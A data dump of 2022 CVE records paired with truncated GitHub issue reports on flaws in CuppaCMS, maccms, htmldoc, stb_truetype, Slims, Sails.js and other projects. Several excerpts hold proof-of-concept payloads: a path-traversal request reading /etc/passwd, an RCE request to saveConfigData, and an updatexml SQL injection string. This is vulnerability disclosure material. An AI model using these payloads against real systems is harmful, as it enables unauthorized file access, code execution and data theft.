{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "552" ]
552
https://github.com/CuppaCMS/CuppaCMS/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can read arbitrary file via copy function ## poc ``` POST /js/filemanager/api/index.php HTTP/1.1 Host: localhost:8888 Content-Type: application/json Origin: http://localhost:8888 Content-Length: 98 {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../out.txt","acti...
Unauthorized Arbitrary File Read vulnerability exists in CuppaCMS
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/28/comments
0
2022-02-19T16:22:14Z
2022-02-19T16:22:14Z
https://github.com/CuppaCMS/CuppaCMS/issues/28
1,144,774,030
28
3,352
CVE-2022-25498
2022-03-15T18:15:12.990
CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "94" ]
94
https://github.com/CuppaCMS/CuppaCMS/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can execute arbitrary php code via `/classes/ajax/Functions.php`, `saveConfigData` function ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1097 Coo...
Unauthorized Remote Code Execution vulnerability exists in CuppaCMS via saveConfigData function
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/29/comments
0
2022-02-19T17:39:40Z
2022-02-19T17:39:40Z
https://github.com/CuppaCMS/CuppaCMS/issues/29
1,144,803,337
29
3,353
CVE-2021-45848
2022-03-15T19:15:07.840
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicotine-plus/nicotine-plus/issues/1777" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/arc...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nicotine-plus:nicotine\\+:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D5E9D12-0801-44F6-936A-006EDD68C8CD", "versionEndExcluding": "3.2.1", "versionEndIncluding": null, "versionSt...
[ "116" ]
116
https://github.com/nicotine-plus/nicotine-plus/issues/1777
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nicotine-plus", "nicotine-plus" ]
Type: <class 'ValueError'> Value: access: embedded null character in path Traceback: File "pynicotine/pynicotine.py", line 385, in network_event File "pynicotine/pynicotine.py", line 1823, in queue_upload File "pynicotine/transfers.py", line 666, in queue_upload File "pynicotine/shares.py", line 646, i...
Just crashed on Win 11 insider ring
https://api.github.com/repos/nicotine-plus/nicotine-plus/issues/1777/comments
2
2021-12-22T17:11:07Z
2021-12-22T19:00:39Z
https://github.com/nicotine-plus/nicotine-plus/issues/1777
1,087,024,217
1,777
3,354
CVE-2021-45852
2022-03-16T10:15:08.103
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "670" ]
670
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
**Version: 1.0** No login is required **Steps to reproduce** 1.Send the data packet as shown,You can see that there is no cookie. ![image](https://user-images.githubusercontent.com/78201553/147246675-3741cee8-7f62-4606-933a-1eb1197dfed8.png) 2.After logging in, I found that the addition was successful ![image](ht...
Unauthorized adding patient in add_patient.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/6/comments
0
2021-12-23T13:36:14Z
2021-12-23T13:36:14Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6
1,087,723,961
6
3,355
CVE-2021-45786
2022-03-16T13:15:08.803
In maccms v10, an attacker can log in through /index.php/user/login in the "col" and "openid" parameters to gain privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/747" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "E1258FF8-1AB2-4A53-88A6-58685BDFEA73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "287" ]
287
https://github.com/magicblack/maccms10/issues/747
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
View the login code, ![image](https://user-images.githubusercontent.com/37065209/141428678-2563585a-59df-402b-96cf-2728e2969d43.png) In addition to logging in through the user name and password, you can also log in through the "col" and "openid" parameters, But these two parameters are completely controllable. Th...
There is an arbitrary user login vulnerability
https://api.github.com/repos/magicblack/maccms10/issues/747/comments
1
2021-11-12T07:46:08Z
2021-11-17T15:54:24Z
https://github.com/magicblack/maccms10/issues/747
1,051,673,479
747
3,356
CVE-2021-45787
2022-03-16T13:15:08.843
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/746" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Trackin...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:-:*:*:*:*:*:*", "matchCriteriaId": "E320DBFC-98FE-4798-82AD-D4DFF465B591", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "79" ]
79
https://github.com/magicblack/maccms10/issues/746
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
网站后台添加视频处,包括名称、备注等参数位置均可插入xss代码 (There is a Storage XSS vulnerability in adding videos,XSS code can be inserted at parameter positions including name and remarks……) ![image](https://user-images.githubusercontent.com/37065209/141251731-da7148b1-efa0-406f-99f7-a2eb14e8175c.png) 插入的xss代码也会在前台被执行,它将影响访问该网站的所有用户 ...
网站后台添加视频处存在存储型XSS漏洞(There is a cross-site scripting (XSS) vulnerability in adding videos)
https://api.github.com/repos/magicblack/maccms10/issues/746/comments
2
2021-11-11T07:08:11Z
2021-11-27T05:12:28Z
https://github.com/magicblack/maccms10/issues/746
1,050,645,219
746
3,357
CVE-2021-23158
2022-03-16T15:15:10.100
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967018" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "415" ]
415
https://github.com/michaelrsweet/htmldoc/issues/414
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a double-free in pspdf_export test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc3.html poc(zipped for update): [poc3.zip](ht...
AddressSanitizer: double-free in function pspdf_export ps-pdf.cxx:945:7
https://api.github.com/repos/michaelrsweet/htmldoc/issues/414/comments
3
2021-01-26T08:44:03Z
2022-06-09T02:03:19Z
https://github.com/michaelrsweet/htmldoc/issues/414
794,045,003
414
3,358
CVE-2021-23165
2022-03-16T15:15:10.157
A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE"...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967014" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B", "versionEndExcluding": "1.9.12", "versionEndIncluding": null, "versionSta...
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/413
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the pspdf_prepare_outpages() ,in ps-pdf.cxx:1338:15 test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf po...
AddressSanitizer: heap-buffer-overflow in pspdf_prepare_outpages() in ps-pdf.cxx:1338:15
https://api.github.com/repos/michaelrsweet/htmldoc/issues/413/comments
3
2021-01-26T08:39:00Z
2022-06-09T02:04:10Z
https://github.com/michaelrsweet/htmldoc/issues/413
794,041,949
413
3,359
CVE-2022-0982
2022-03-16T15:15:16.253
The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve_disclosure@tech.gov.sg", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/issues/164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/iss...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:accel-ppp:accel-ppp:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB0C5840-2CCB-4241-8AD3-F3A591D314AA", "versionEndExcluding": null, "versionEndIncluding": "1.12.0", "versionStartEx...
[ "787" ]
787
https://github.com/xebd/accel-ppp/issues/164
[ "Third Party Advisory" ]
github.com
[ "xebd", "accel-ppp" ]
Dear accel-ppp Development Team, I have filed a vulnerability disclosure by email to dev@accel-ppp.org. Please let me know when it is patched and we can use this issue for tracking purposes. Thanks!
Vulnerability Disclosure
https://api.github.com/repos/xebd/accel-ppp/issues/164/comments
5
2022-01-04T06:09:13Z
2022-08-17T19:56:04Z
https://github.com/xebd/accel-ppp/issues/164
1,093,041,261
164
3,360
CVE-2022-26300
2022-03-17T00:15:07.857
EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EOSIO/eos/issues/10820" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eosio_project:eos:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "635BF251-7282-44AE-9A48-59AA2C6B26DE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "787" ]
787
https://github.com/EOSIO/eos/issues/10820
[ "Exploit", "Third Party Advisory" ]
github.com
[ "EOSIO", "eos" ]
**EOS:** 2.1.0 **Ubuntu:** 20.04 **Compiler:** llvm-7 clang-7 clang++-7 llvm-cov-7 ---- I want to use `txn_test_gen_plugin` to generate transactions, and the process is following the guidance: https://github.com/EOSIO/eos/blob/develop/plugins/txn_test_gen_plugin/README.md I have started the producer node (`e...
[heap-buffer-overflow] happens while using txn_test_gen_plugin
https://api.github.com/repos/EOSIO/eos/issues/10820/comments
3
2021-10-19T05:52:33Z
2021-10-27T17:46:20Z
https://github.com/EOSIO/eos/issues/10820
1,029,887,961
10,820
3,361
CVE-2022-25514
2022-03-17T01:15:06.977
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "787" ]
787
https://github.com/nothings/stb/issues/1286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttUSHORT() at stb_truetype.h:1286 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPL...
heap-buffer-overflow in function ttUSHORT() at stb_truetype.h:1286
https://api.github.com/repos/nothings/stb/issues/1286/comments
1
2022-02-16T15:20:17Z
2022-02-17T06:54:48Z
https://github.com/nothings/stb/issues/1286
1,140,162,314
1,286
3,362
CVE-2022-25515
2022-03-17T01:15:07.020
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "787" ]
787
https://github.com/nothings/stb/issues/1288
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttLONG() at stb_truetype.h:1288 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPLEM...
heap-buffer-overflow in function ttULONG() at stb_truetype.h:1288
https://api.github.com/repos/nothings/stb/issues/1288/comments
1
2022-02-16T15:32:13Z
2022-02-17T06:55:53Z
https://github.com/nothings/stb/issues/1288
1,140,194,570
1,288
3,363
CVE-2022-25516
2022-03-17T01:15:07.063
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "787" ]
787
https://github.com/nothings/stb/issues/1287
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at stb_truetype.h:1313 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRU...
heap-buffer-overflow in function stbtt__find_table at stb_truetype.h:1313
https://api.github.com/repos/nothings/stb/issues/1287/comments
1
2022-02-16T15:29:22Z
2022-02-17T06:55:46Z
https://github.com/nothings/stb/issues/1287
1,140,187,875
1,287
3,364
CVE-2021-45791
2022-03-17T11:15:07.537
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims8_akasia/issues/200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:8.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "D3459EC4-33BA-4FF6-B1AA-630E86795A96", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims8_akasia/issues/200
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims8_akasia" ]
Hello, I found some serious bugs in Slims8 Akasia 8.3.1 (latest version). First of all, there is a SQL injection bug. This injection exists in multiple files, and the file where the search keyword $_GET['dir'] is located all has SQL injection. url:[http://localhost/admin/modules/bibliography/index.php?itemID=17&d...
[Security Bugs] Multiple Sql Injection
https://api.github.com/repos/slims/slims8_akasia/issues/200/comments
2
2021-12-21T07:05:29Z
2021-12-22T08:45:12Z
https://github.com/slims/slims8_akasia/issues/200
1,085,505,912
200
3,365
CVE-2021-45792
2022-03-17T11:15:07.667
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/slims/slims9_bulian/issues/122
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site script attacks. **To Reproduce** Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in /admin...
[Security Bug]Stored cross-site script attacks(xss)
https://api.github.com/repos/slims/slims9_bulian/issues/122/comments
1
2021-12-22T08:39:34Z
2025-01-04T07:03:17Z
https://github.com/slims/slims9_bulian/issues/122
1,086,586,652
122
3,366
CVE-2021-44908
2022-03-17T12:15:07.800
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/sailsJS%20PoC.zip" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/balderdashy/sails/b...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sailsjs:sails:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "64418401-6896-4887-BEC6-34C9C3E66071", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExc...
[ "1321" ]
1321
https://github.com/balderdashy/sails/issues/7209
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "balderdashy", "sails" ]
**Node version**: 12.13.0 **Sails version** _(sails)_: 1.4.0 else-if statement in lines 134-165 https://github.com/balderdashy/sails/blob/master/lib/app/private/controller/load-action-modules.js#L163) is vulnerable to prototype pollution. The object assignment on line 163 may lead to denial of service or property ...
Prototype pollution in LoadActionModules() CVE-2021-44908
https://api.github.com/repos/balderdashy/sails/issues/7209/comments
3
2022-03-15T03:02:07Z
2022-03-20T14:17:52Z
https://github.com/balderdashy/sails/issues/7209
1,169,125,354
7,209
3,367
CVE-2021-45793
2022-03-17T12:15:07.843
Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/123
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login "find a book" SQL injection attack in the comments (example:`'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1` ) <img width=...
[Security Bugs] Sql Injection
https://api.github.com/repos/slims/slims9_bulian/issues/123/comments
1
2021-12-22T09:49:53Z
2022-12-23T03:52:33Z
https://github.com/slims/slims9_bulian/issues/123
1,086,645,532
123
3,368
CVE-2021-45794
2022-03-17T12:15:07.883
Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/124
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: `http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1` Vulnerable parameter `id` SQL injection payload `Parameter: id (GET) ...
[Security Bugs] SQL Injection
https://api.github.com/repos/slims/slims9_bulian/issues/124/comments
1
